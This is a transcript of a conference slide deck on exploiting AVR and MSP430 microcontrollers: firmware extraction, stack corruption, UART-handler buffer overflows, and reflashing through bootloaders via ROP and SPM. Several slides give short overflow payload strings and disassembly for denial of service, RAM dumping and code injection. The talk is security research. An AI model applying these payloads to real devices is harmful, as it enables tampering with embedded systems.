vadim bardakov - avr & msp exploitation
DESCRIPTION
TRANSCRIPT
AVR & MSP exploitation
Vadim BardakovSecurity ResearcherDigital Security (ERPScan)
2
Why now?
AVR & MSP exploitation
© 2002—2013, Digital Security
• Inc. usage of uC• Nobody cares about code security for these devices
3
Why now?
AVR & MSP exploitation
© 2002—2013, Digital Security
• Inc. usage of uC• Nobody cares about code security for these devices
• Inc. amount of easily accessible data channels • Microcontroller firmware can be retrieved
4
Jokes
AVR & MSP exploitation
© 2002—2013, Digital Security
5
What if it works?
© 2002—2013, Digital Security
AVR & MSP exploitation
6
Oops…
© 2002—2013, Digital Security
AVR & MSP exploitation
7
Firmware extraction
AVR & MSP exploitation
© 2002—2013, Digital Security
Side channel attacks• Power analysis
8
Firmware extraction
AVR & MSP exploitation
© 2002—2013, Digital Security
Side channel attacks• Power analysis• Planarization• etc.
9
Firmware extraction
AVR & MSP exploitation
© 2002—2013, Digital Security
MSP430:• FRAM• 5xx• 6xx
10
RAM
AVR & MSP exploitation
© 2002—2013, Digital Security
MSP AVR
11
RAM
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/OSpecial Function
Registers
Additional I/O registers
Internal RAM
12
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/OSpecial Function
Registers
Additional I/O registers
Internal RAM
13
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/OSpecial Function
Registers
Additional I/O registers
Internal RAM
SP
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
14
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/OSpecial Function
Registers
Additional I/O registers
Internal RAM
SP ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
Interrupt handler:UARTTimersComparatorsINT0..X
15
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/OSpecial Function
Registers
Additional I/O registers
Internal RAM
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
SP
Interrupt handler:UARTTimersComparatorsINT0..X
16
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/O Special Function
Registers
Additional I/O registers
Internal RAM
SP ffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Reconfiguring peripheral devices….Lost control
17
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/O Special Function
Registers
Additional I/O registers
Internal RAM
SP ffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Reconfiguring peripheral devices….Lost control
18
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/O Special Function
Registers
Additional I/O registers
Internal RAM
SP ffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Reconfiguring peripheral devices….Lost control
19
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/O Special Function
Registers
Additional I/O registers
Internal RAM
SP ffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Reconfiguring peripheral devices….Lost control
20
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/O Special Function
Registers
Additional I/O registers
Internal RAM
SP ffff2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020
Reconfiguring peripheral devices….Seems OK
21
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/O Special Function
Registers
Additional I/O registers
Internal RAM
Global VariablesUnknown offset
22
Stack errors
AVR & MSP exploitation
© 2002—2013, Digital Security
General purpose registers
I/O Special Function
Registers
Additional I/O registers
Internal RAMBypassing checks
23
Buffer overflow
AVR & MSP exploitation
© 2002—2013, Digital Security
Access:• Local variables• Return address:
• Compiler-generated instructions• Interruption • Bootloader
24
Buffer overflow
AVR & MSP exploitation
© 2002—2013, Digital Security
ISR(UART0_RECEIVE_INTERRUPT){ UART_RxHead++; UART_RxBuf[UART_RxHead] =
UART0_DATA;}
Casual for UART handlers
25
Buffer overflow
AVR & MSP exploitation
© 2002—2013, Digital Security
ISR(UART0_RECEIVE_INTERRUPT){ UART_RxHead++; UART_RxBuf[UART_RxHead] =
UART0_DATA;}
000001FB CLI 000001FC RJMP PC-0x0000
print “\xff”xB . “\x01\0xFC”xN
Atmel Studio 6.1
26
Buffer overflow
AVR & MSP exploitation
© 2002—2013, Digital Security
ISR(UART0_RECEIVE_INTERRUPT){ UART_RxHead++; UART_RxBuf[UART_RxHead] =
UART0_DATA;}
print “\xff”xN
000001FB CLI 000001FC RJMP PC-0x0000
27
Buffer overflow
AVR & MSP exploitation
© 2002—2013, Digital Security
ISR(UART0_RECEIVE_INTERRUPT){ UART_RxHead++; UART_RxBuf[UART_RxHead] =
UART0_DATA;}
print “\xff”xN
000001FB CLI 000001FC RJMP PC-0x0000
DoS
28
Buffer overflow
AVR & MSP exploitation
© 2002—2013, Digital Security
ISR(UART0_RECEIVE_INTERRUPT){ UART_RxHead++; UART_RxBuf[UART_RxHead] =
UART0_DATA;}
void uart_puts(const char *s ){ while (*s) uart_putc(*s++);
} Dumping RAM
uart_puts(p);000001C8 LDD R24,Y+1 Load indirect with displacement000001CA LDD R25, Y+2 Load immediate 000001CB CALL 0x0000014E Call subroutine
print “\xff”xB . “\x01\0xFC”xN. P
29
Reprogramming
AVR & MSP exploitation
© 2002—2013, Digital Security
30
Reprogramming
AVR & MSP exploitation
© 2002—2013, Digital Security
Open-source bootloaders sucks in production.
31
Reprogramming
AVR & MSP exploitation
© 2002—2013, Digital Security
print “\xff”xB . “\x00\0x16”xN. ROPTail Load code to RAM
Interruption handler
Ideal for ROP
32
Reprogramming
AVR & MSP exploitation
© 2002—2013, Digital Security
Writing code to FLASH
+00000343: 95E8 SPM Store program memory….+00000351: 95E8 SPM Store program memory
print Code . “\x00\0xFC”xN. P Gain control to SPM
Atmex
33
Sum
© 2002—2013, Digital Security
• Simple attacks can be conducted blindly• Different consequences:
• DoS• Modifying device configuration• etc.
AVR & MSP exploitation
www.dsec.ruwww.erpscan.com [email protected]
© 2002—2013, Digital Security
Digital Security in Moscow: +7 (495) 223-07-86Digital Security in Saint Petersburg: +7 (812) 703-15-47
34